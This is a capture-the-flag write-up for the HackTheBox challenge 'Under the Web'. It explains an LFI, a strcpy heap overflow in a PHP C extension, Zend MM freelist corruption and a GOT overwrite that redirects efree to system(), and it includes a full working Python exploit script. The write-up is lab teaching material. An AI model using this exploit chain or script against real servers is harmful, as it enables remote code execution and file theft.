Task: PHP gallery app with custom C extension (metadata_reader.so) that reads PNG tEXt chunks via strcpy into 56-byte emalloc buffers with no bounds check; LFI in view.php; flag at unknown SHA256-hashed path. Solution: ASLR bypass via /proc/self/maps LFI, heap grooming, Zend MM freelist corruption via strcpy overflow to GOT-overwrite _efree with system(), RCE to list directory, then LFI to read flag.

$ ls tags/ techniques/
lfi_arbitrary_file_read  aslr_bypass_via_proc_self_maps  zend_mm_freelist_corruption  heap_grooming  got_overwrite_via_heap_overflow  rce_via_efree_to_system  shell_comment_truncation

Under the Web — HackTheBox

Description

Dive deep under the web's surface, where 'L' in LFI stands for 'LEAK'. Will you conquer the depths and claim victory?

A PHP gallery web application runs on PHP 8.2.12's built-in development server (single process) with a custom C extension metadata_reader.so that provides a getImgMetadata() function. The extension reads PNG tEXt chunks (Title, Artist, Copyright) and returns them as a formatted string. The flag file is renamed to a SHA256 hash during Docker build, so the filename must be discovered at runtime.
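For orientation, a tEXt chunk is a length-prefixed record: a 4-byte big-endian length, the type tEXt, then keyword, a NUL separator and the text, followed by a CRC-32. The sketch below builds and walks such chunks. It illustrates the file format only and is not the extension's parser; the helper names are made up for this example, and the sample stream omits IHDR/IDAT, so it is not a displayable image.

```python
import struct
import zlib

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"

def make_chunk(ctype: bytes, data: bytes) -> bytes:
    """length (4, big-endian) + type (4) + data + CRC-32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)

def iter_text_chunks(png: bytes):
    """Yield (keyword, text) for every tEXt chunk in a PNG byte string."""
    assert png.startswith(PNG_MAGIC)
    pos = len(PNG_MAGIC)
    while pos + 8 <= len(png):
        length, ctype = struct.unpack_from(">I4s", png, pos)
        data = png[pos + 8 : pos + 8 + length]
        if ctype == b"tEXt":
            keyword, _, text = data.partition(b"\x00")
            yield keyword.decode("latin-1"), text
        pos += 12 + length  # 4 length + 4 type + data + 4 CRC

# The format itself puts no 56-byte limit on the text field.
sample = PNG_MAGIC + make_chunk(b"tEXt", b"Title\x00" + b"A" * 62) + make_chunk(b"IEND", b"")
chunks = list(iter_text_chunks(sample))
print(chunks[0][0], len(chunks[0][1]))
```

The point to take away is that the text length is attacker-controlled: nothing in the container format stops a Title of 62 bytes or more.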

Key files:

  • index.php — gallery page listing uploads/*.png, calls getImgMetadata() on each
  • upload.php — uploads PNG files (checks magic bytes + .png extension, no .. in path), calls getImgMetadata() on uploaded file
  • view.php — LFI via file_get_contents(urldecode($_GET['image'])) — reads arbitrary files
  • metadata_reader.so — PHP extension with heap buffer overflow vulnerability
  • start.sh — runs php -S 0.0.0.0:8000 -dextension=./metadata_reader.so in a while true loop (auto-restart on crash)

Analysis

Architecture

The PHP built-in web server is single-process — all requests are handled sequentially by the same process. This means heap state persists between requests, which is critical for heap grooming and exploitation.

Vulnerability #1: LFI in view.php

$image = urldecode($_GET['image']);
if (file_exists($image)) {
    echo '<img src="data:image/png;base64,' . base64_encode(file_get_contents($image)) . '">';
}

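PHP has already URL-decoded $_GET['image'] before the explicit urldecode() runs, so the value is decoded twice and double URL-encoded input would slip past any filter that inspects the raw query string. The snippet shown applies no path check beyond file_exists(), so any file readable by the PHP process can be read once its path is known. This is used for the ASLR bypass (/proc/self/maps) and for flag retrieval.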
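The double decoding can be modelled in a few lines of Python. This is a sketch under assumptions: urllib's unquote stands in for both PHP decoding passes (PHP's urldecode additionally maps + to a space), and the function names are hypothetical.

```python
from urllib.parse import quote, unquote

def double_encode(path: str) -> str:
    """Percent-encode every reserved character, then encode the result again."""
    return quote(quote(path, safe=""), safe="")

def php_view_decode(raw_query_value: str) -> str:
    """Model of view.php: one decode when PHP fills $_GET, one more in urldecode()."""
    return unquote(unquote(raw_query_value))

encoded = double_encode("/proc/self/maps")
print(encoded)                   # %252Fproc%252Fself%252Fmaps
print(php_view_decode(encoded))  # /proc/self/maps
```

A plain, singly encoded path decodes to the same result, which is why the solve script can pass the path through requests without any extra encoding.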

Vulnerability #2: Heap Buffer Overflow in metadata_reader.so

The getImgMetadata() function (at offset 0x1300 in the .so) processes PNG tEXt chunks with a critical flaw:

// For each Title/Artist/Copyright tEXt chunk:
md->Title = (char *)_emalloc_56();  // allocates exactly 56 bytes
strcpy(md->Title, text);            // NO BOUNDS CHECK: text from PNG can be arbitrary length

The MetaData struct is also 56 bytes, allocated from the same Zend MM bin:

struct MetaData {            // offset  size
    char *Artist;            // 0x00    8
    char *Title;             // 0x08    8
    char *Copyright;         // 0x10    8
    char *PngName;           // 0x18    8
    png_structp png_ptr;     // 0x20    8
    png_infop info_ptr;      // 0x28    8
    png_textp text_ptr;      // 0x30    8
};                           // 0x38 = 56 bytes, the SAME bin as the text buffers!

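Because MetaData and the text buffers come from the same 56-byte Zend MM bin, their slots sit back to back in the same run of pages. Zend MM stores a free slot's next-free pointer in the first 8 bytes of the slot itself, so a strcpy overflow out of a text buffer lands directly on the free list pointer of the following slot when that slot is free.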
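The size arithmetic can be checked quickly. The sketch below assumes a 64-bit target with 8-byte pointers and no padding, which matches the offsets listed in the struct; spilled_bytes is a hypothetical helper name.

```python
import struct

SLOT_SIZE = 56
FIELDS = ["Artist", "Title", "Copyright", "PngName", "png_ptr", "info_ptr", "text_ptr"]

# Seven 8-byte pointers on a 64-bit target.
struct_size = struct.calcsize("<7Q")
offsets = {name: 8 * i for i, name in enumerate(FIELDS)}

def spilled_bytes(text_len: int) -> int:
    """Bytes written past a 56-byte slot when strcpy copies text_len bytes
    of text plus the terminating NUL."""
    return max(0, text_len + 1 - SLOT_SIZE)

print(struct_size, hex(offsets["text_ptr"]))  # 56 0x30
print(spilled_bytes(50), spilled_bytes(56), spilled_bytes(62))  # 0 1 7
```

A 50-byte string stays inside its slot, a 56-byte string already spills its terminator, and a 62-byte string writes 6 payload bytes plus a NUL into the neighbouring slot.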

Vulnerability #3: Uninitialized Heap Pointers

_emalloc_56() does NOT zero memory. Only md->PngName is initialized after allocation. If a PNG has no Title/Artist/Copyright tEXt chunks, stale pointers from previous allocations are dereferenced by snprintf (info leak) and efree (heap corruption).

Exploitation Primitive

The output section processes fields in fixed order — Title, Artist, Copyright — and calls efree() on each:

// 1. Title
snprintf(Card + strlen(Card), 0x100 - strlen(Card), "Title: %s\n", md->Title);
efree(md->Title);  // ← if _efree GOT is overwritten with system(), this becomes system(md->Title)

// 2. Artist
snprintf(..., "Artist: %s\n", md->Artist);
efree(md->Artist);

// 3. Copyright
snprintf(..., "Copyright: %s\n", md->Copyright);
efree(md->Copyright);

// 4. Struct
efree(md);

The extension is built with partial RELRO, so its .got.plt entries are writable. The _efree GOT entry, at offset 0x4090 from the extension base, can be overwritten with the address of system().

Solution

Phase 1: ASLR Bypass via LFI

Read /proc/self/maps through the LFI in view.php to extract base addresses:

data = view_lfi(target, "/proc/self/maps")
maps_text = data.decode()

for line in maps_text.split("\n"):
    if "metadata_reader" in line and "r--p 00000000" in line:
        ext_base = int(re.match(r"([0-9a-f]+)-", line).group(1), 16)
    if "libc.so.6" in line and "r--p 00000000" in line:
        libc_base = int(re.match(r"([0-9a-f]+)-", line).group(1), 16)

efree_got = ext_base + 0x4090      # _efree GOT entry in metadata_reader.so
system_addr = libc_base + 0x4C3A0  # system() in libc
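To make the parsing concrete, here is a self-contained variant run against a made-up maps excerpt. The addresses, inode numbers and paths in SAMPLE_MAPS are invented for illustration, and find_base is a hypothetical helper that matches on the offset column instead of the "r--p 00000000" substring used above.

```python
SAMPLE_MAPS = """\
7f1234560000-7f1234561000 r--p 00000000 08:01 131 /app/metadata_reader.so
7f1234561000-7f1234562000 r-xp 00001000 08:01 131 /app/metadata_reader.so
7f5566000000-7f5566028000 r--p 00000000 08:01 977 /usr/lib/x86_64-linux-gnu/libc.so.6
7f5566028000-7f55661bd000 r-xp 00028000 08:01 977 /usr/lib/x86_64-linux-gnu/libc.so.6
"""

def find_base(maps_text, needle):
    """Return the start address of the mapping of `needle` with file offset 0."""
    for line in maps_text.splitlines():
        fields = line.split()
        if len(fields) >= 6 and needle in fields[5] and fields[2] == "00000000":
            return int(fields[0].split("-")[0], 16)
    return None

ext_base = find_base(SAMPLE_MAPS, "metadata_reader")
libc_base = find_base(SAMPLE_MAPS, "libc.so.6")
efree_got = ext_base + 0x4090      # offset taken from the writeup
system_addr = libc_base + 0x4C3A0  # offset taken from the writeup
print(hex(efree_got), hex(system_addr))
```

The libc offset is specific to the libc build in the challenge image, so it would need to be re-derived for any other target.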

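Only the low 6 bytes of each address are written, and none of them may be a null byte, because strcpy stops at the first one. The two high bytes of a user-space address are zero anyway: strcpy's terminating NUL supplies byte 6, and byte 7 of the pointer being overwritten is already zero. Addresses in the 0x7fXXXXXXXXXX range usually satisfy the constraint, but a randomized byte can still come out as 0x00; the solve script checks for this and aborts.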
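The constraint is easy to check in isolation. In this sketch the addresses are made up, and strcpy_payload and after_strcpy are hypothetical helpers that model what a 6-byte copy plus terminator does to an existing 8-byte pointer.

```python
import struct

def strcpy_payload(addr: int) -> bytes:
    """Low 6 little-endian bytes of addr, or ValueError if strcpy could not copy them."""
    low6 = struct.pack("<Q", addr)[:6]
    if addr >> 48 or b"\x00" in low6:
        raise ValueError(f"0x{addr:x} is not strcpy-safe")
    return low6

def after_strcpy(old_qword: bytes, payload: bytes) -> int:
    """Value of an 8-byte pointer after strcpy writes payload + NUL over its start."""
    written = payload + b"\x00"
    return struct.unpack("<Q", written + old_qword[len(written):])[0]

old_pointer = struct.pack("<Q", 0x7F0000200038)  # made-up heap pointer
good = 0x7F1234564090                            # made-up GOT address
print(hex(after_strcpy(old_pointer, strcpy_payload(good))))  # 0x7f1234564090

bad = 0x7F12345BC000 + 0x4090  # = 0x7f12345c0090, second byte is 0x00
try:
    strcpy_payload(bad)
except ValueError as exc:
    print(exc)
```

The second case shows that a base ending in 0xc000 combined with the 0x4090 offset produces a null byte, so the constraint is not guaranteed by the address range alone.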

Phase 2: Heap Grooming

Upload a normal PNG with Title/Artist/Copyright text chunks (50 bytes each) to populate the 56-byte Zend MM bin with known allocations and establish a predictable free list state:

png_groom = create_png(texts=[
    ("Title", "G" * 50),
    ("Artist", "G" * 50),
    ("Copyright", "G" * 50),
])
upload(target, png_groom, "groom.png")

After this request completes, the free list in the 56-byte bin has a known LIFO order: md → Copyright_buf → Artist_buf → Title_buf → ...
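The LIFO order follows from the order of the efree() calls in the output section. A minimal model, assuming each bin keeps a singly linked free list whose head is the most recently freed slot (slot names are the labels used above, and this ignores any other 56-byte allocations PHP itself makes during the request):

```python
free_list = []  # index 0 is the head of the bin's free list

def efree(slot):
    """Freed slots are pushed onto the head."""
    free_list.insert(0, slot)

def emalloc():
    """Allocations pop from the head."""
    return free_list.pop(0)

# Order of the efree() calls in the extension's output section.
for slot in ["Title_buf", "Artist_buf", "Copyright_buf", "md"]:
    efree(slot)

print(" -> ".join(free_list))  # md -> Copyright_buf -> Artist_buf -> Title_buf
```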

Phase 3: GOT Overwrite via Heap Overflow

Upload a crafted exploit PNG with three tEXt chunks that chain together to overwrite the _efree GOT entry:

# Shell command padded to exactly 56 bytes (fills the emalloc buffer)
command = b"ls /app/ > /app/uploads/ls.txt #"
command_padded = command + b"A" * (56 - len(command))

# Title: 56 bytes (fills buffer) + 6 bytes (overflow into next slot's free list pointer)
title_data = command_padded + efree_got_bytes

# Artist: normal padding (consumes the regular free slot, leaving corrupted pointer as next head)
artist_data = b"X" * 50

# Copyright: system() address (6 bytes), written to the GOT via corrupted free list
copyright_data = system_addr_bytes

How the overflow chain works:

  1. Title allocation: emalloc(56) returns a free slot. strcpy writes 62 bytes — 56 fill the buffer, 6 overflow into the next free slot's Zend MM free list pointer, replacing it with the _efree GOT address.

  2. Artist allocation: emalloc(56) returns the next normal free slot (the one whose free list pointer was just corrupted). After this allocation, the free list head now points to the _efree GOT address.

  3. Copyright allocation: emalloc(56) follows the corrupted free list and returns the GOT address as a writable buffer. strcpy writes the 6-byte system() address there, overwriting the _efree GOT entry.
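The three steps can be replayed on a toy allocator. This is a simplified model, not Zend MM itself: it assumes the free slots are threaded in address order, skips the MetaData allocation that precedes Title, and uses made-up addresses. ToyBin and its methods are hypothetical names.

```python
import struct

SLOT = 56

class ToyBin:
    """One small bin: each free slot stores the address of the next free
    slot in its first 8 bytes, and the heap only remembers the head."""

    def __init__(self, base: int, nslots: int):
        self.base = base
        self.mem = bytearray(SLOT * nslots)
        for i in range(nslots):  # thread the slots in address order
            nxt = base + SLOT * (i + 1) if i + 1 < nslots else 0
            struct.pack_into("<Q", self.mem, SLOT * i, nxt)
        self.head = base

    def emalloc(self) -> int:
        addr = self.head
        off = addr - self.base
        if 0 <= off <= len(self.mem) - 8:
            self.head = struct.unpack_from("<Q", self.mem, off)[0]
        else:
            self.head = 0  # outside the model; a real allocator would read 8 bytes there
        return addr

    def strcpy(self, dst: int, data: bytes) -> None:
        off = dst - self.base
        payload = data + b"\x00"                    # the terminator is copied too
        self.mem[off:off + len(payload)] = payload  # no bounds check, like the bug

HEAP_BASE = 0x7F0000200000  # made-up heap address
EFREE_GOT = 0x7F1234564090  # made-up GOT address
got6 = struct.pack("<Q", EFREE_GOT)[:6]

heap = ToyBin(HEAP_BASE, nslots=4)
title = heap.emalloc()
heap.strcpy(title, b"A" * 56 + got6)  # step 1: overflow into the next slot
artist = heap.emalloc()               # step 2: head becomes the planted address
heap.strcpy(artist, b"X" * 50)
copyright_buf = heap.emalloc()        # step 3: allocator hands out the GOT address
print(hex(title), hex(artist), hex(copyright_buf))
```

In the model, the third allocation returns EFREE_GOT, which is the write-what-where primitive the exploit relies on.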

Phase 4: Code Execution

When the output section runs efree(md->Title), it now calls system() with the Title buffer as the argument:

system("ls /app/ > /app/uploads/ls.txt #AAAAAAAAAAAAAAAAAAAAAAAAA\x90\xf0...")

The # character in the shell command comments out all the binary garbage (padding + GOT address bytes) that follows, so the command executes cleanly. The directory listing of /app/ is written to /app/uploads/ls.txt.
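The truncation effect can be approximated offline with Python's shlex, which treats # as a comment start when comments=True. shlex only approximates POSIX shell lexing, and the trailing address bytes here are made up.

```python
import shlex

command = b"ls /app/ > /app/uploads/ls.txt #"
padded = command + b"A" * (56 - len(command))
garbage = b"\x90\x40\x56\x34\x12\x7f"  # made-up address bytes after the padding

# latin-1 maps every byte to one character, so nothing is lost in decoding.
argument = (padded + garbage).decode("latin-1")
tokens = shlex.split(argument, comments=True)

print(len(command), len(padded))  # 32 56
print(tokens)                     # ['ls', '/app/', '>', '/app/uploads/ls.txt']
```

Everything after the # never reaches the command line that the shell executes, regardless of which bytes it contains (as long as there is no newline).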

The server crashes after the GOT corruption but auto-restarts via the while true loop in start.sh.

Phase 5: Flag Retrieval

  1. Wait for server restart, then read the directory listing via LFI:

     data = view_lfi(target, "/app/uploads/ls.txt")
     listing = data.decode()
     # Find SHA256 hash filename (64 hex characters)
     flag_hash = re.findall(r"[a-f0-9]{64}", listing)[0]

  2. Read the flag file:

     flag_data = view_lfi(target, f"/app/{flag_hash}")
     flag = flag_data.decode().strip()
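The filename match can be tried on a sample listing. The listing below is invented (the hash is a placeholder, not the real flag name), and find_hash_names is a hypothetical helper that adds word boundaries so a longer hex run is not matched by accident.

```python
import re

PLACEHOLDER_HASH = "ab" * 32  # 64 hex characters, stands in for the real name
SAMPLE_LISTING = "\n".join(
    ["index.php", "metadata_reader.so", PLACEHOLDER_HASH, "upload.php", "uploads", "view.php"]
) + "\n"

def find_hash_names(listing: str):
    """Return every standalone run of exactly 64 lowercase hex characters."""
    return re.findall(r"\b[a-f0-9]{64}\b", listing)

names = find_hash_names(SAMPLE_LISTING)
print(names[0] if names else "no candidate found")
```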

Full Solve Script

#!/usr/bin/env python3
"""
Under the Web - HackTheBox PWN Challenge
Exploit: LFI ASLR bypass → Heap overflow → GOT overwrite → RCE → Flag
"""
import struct
import zlib
import sys
import requests
import re
import base64
import time


def create_png_chunk(chunk_type, data):
    chunk = chunk_type + data
    crc = struct.pack(">I", zlib.crc32(chunk) & 0xFFFFFFFF)
    length = struct.pack(">I", len(data))
    return length + chunk + crc


def create_png(texts=None, width=1, height=1):
    png = b"\x89PNG\r\n\x1a\n"
    ihdr_data = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    png += create_png_chunk(b"IHDR", ihdr_data)
    if texts:
        for keyword, value in texts:
            if isinstance(keyword, str):
                keyword = keyword.encode()
            if isinstance(value, str):
                value = value.encode()
            png += create_png_chunk(b"tEXt", keyword + b"\x00" + value)
    raw_data = b"\x00" + b"\xff\x00\x00" * width
    compressed = zlib.compress(raw_data * height)
    png += create_png_chunk(b"IDAT", compressed)
    png += create_png_chunk(b"IEND", b"")
    return png


def upload(url, png_data, filename):
    files = {"file": (filename, png_data, "image/png")}
    try:
        return requests.post(f"{url}/upload.php", files=files, timeout=10)
    except Exception as e:
        print(f" Upload error: {e}")
        return None


def view_lfi(url, path):
    resp = requests.get(f"{url}/view.php", params={"image": path}, timeout=10)
    b64 = re.findall(r"base64,([A-Za-z0-9+/=]+)", resp.text)
    if b64 and b64[0]:
        return base64.b64decode(b64[0])
    return None


def main():
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_url>")
        sys.exit(1)
    target = sys.argv[1].rstrip("/")
    print(f"[*] Target: {target}")

    # Phase 1: ASLR bypass via LFI
    print("\n[Phase 1] Leaking addresses via LFI (/proc/self/maps)")
    data = view_lfi(target, "/proc/self/maps")
    if not data:
        print("[-] Failed to read /proc/self/maps")
        sys.exit(1)
    maps_text = data.decode()

    ext_base = libc_base = None
    for line in maps_text.split("\n"):
        if "metadata_reader" in line and "r--p 00000000" in line:
            match = re.match(r"([0-9a-f]+)-", line)
            if match:
                ext_base = int(match.group(1), 16)
        if "libc.so.6" in line and "r--p 00000000" in line:
            match = re.match(r"([0-9a-f]+)-", line)
            if match:
                libc_base = int(match.group(1), 16)
    if not ext_base or not libc_base:
        print("[-] Failed to find required addresses")
        sys.exit(1)

    efree_got = ext_base + 0x4090
    system_addr = libc_base + 0x4C3A0
    print(f" metadata_reader.so base: 0x{ext_base:x}")
    print(f" libc base: 0x{libc_base:x}")
    print(f" _efree GOT: 0x{efree_got:x}")
    print(f" system(): 0x{system_addr:x}")

    efree_got_bytes = struct.pack("<Q", efree_got)[:6]
    system_addr_bytes = struct.pack("<Q", system_addr)[:6]
    if b"\x00" in efree_got_bytes or b"\x00" in system_addr_bytes:
        print("[-] Address contains null bytes; exploit won't work with strcpy")
        sys.exit(1)

    # Phase 2: Heap grooming
    print("\n[Phase 2] Grooming heap")
    png_groom = create_png(texts=[
        ("Title", "G" * 50),
        ("Artist", "G" * 50),
        ("Copyright", "G" * 50),
    ])
    resp = upload(target, png_groom, "groom.png")
    if not resp or resp.status_code != 200:
        print("[-] Grooming failed")
        sys.exit(1)
    print(" [+] Heap groomed")

    # Phase 3: GOT overwrite exploit
    print("\n[Phase 3] Sending exploit PNG (GOT overwrite)")
    command = b"ls /app/ > /app/uploads/ls.txt #"
    command_padded = command + b"A" * (56 - len(command))
    title_data = command_padded + efree_got_bytes
    artist_data = b"X" * 50
    copyright_data = system_addr_bytes
    png_exploit = create_png(texts=[
        ("Title", title_data),
        ("Artist", artist_data),
        ("Copyright", copyright_data),
    ])
    resp = upload(target, png_exploit, "exploit.png")
    if resp:
        print(f" Response: {resp.status_code} ({len(resp.text)} bytes)")
    else:
        print(" Server crashed (expected, exploit triggered)")

    # Wait for server restart
    print(" Waiting for server restart...")
    time.sleep(3)
    for _ in range(10):
        try:
            resp = requests.get(f"{target}/", timeout=5)
            if resp.status_code == 200:
                print(" [+] Server is back")
                break
        except requests.RequestException:
            # Server still down; retry after a short pause
            time.sleep(1)

    # Phase 4: Read directory listing and find flag
    print("\n[Phase 4] Reading directory listing")
    data = view_lfi(target, "/app/uploads/ls.txt")
    if not data:
        print("[-] ls.txt not found; exploit may have failed")
        sys.exit(1)
    listing = data.decode("utf-8", errors="replace")
    print(f" /app/ directory listing:\n{listing}")
    hashes = re.findall(r"[a-f0-9]{64}", listing)
    if not hashes:
        print("[-] No SHA256 hash found in directory listing")
        sys.exit(1)
    flag_hash = hashes[0]
    print(f"\n [+] Flag file hash: {flag_hash}")

    # Phase 5: Read the flag
    print("\n[Phase 5] Reading flag")
    flag_data = view_lfi(target, f"/app/{flag_hash}")
    if not flag_data:
        print("[-] Failed to read flag file")
        sys.exit(1)
    flag = flag_data.decode("utf-8", errors="replace").strip()
    print(f"\n{'=' * 60}")
    print(f" FLAG: {flag}")
    print(f"{'=' * 60}")


if __name__ == "__main__":
    main()
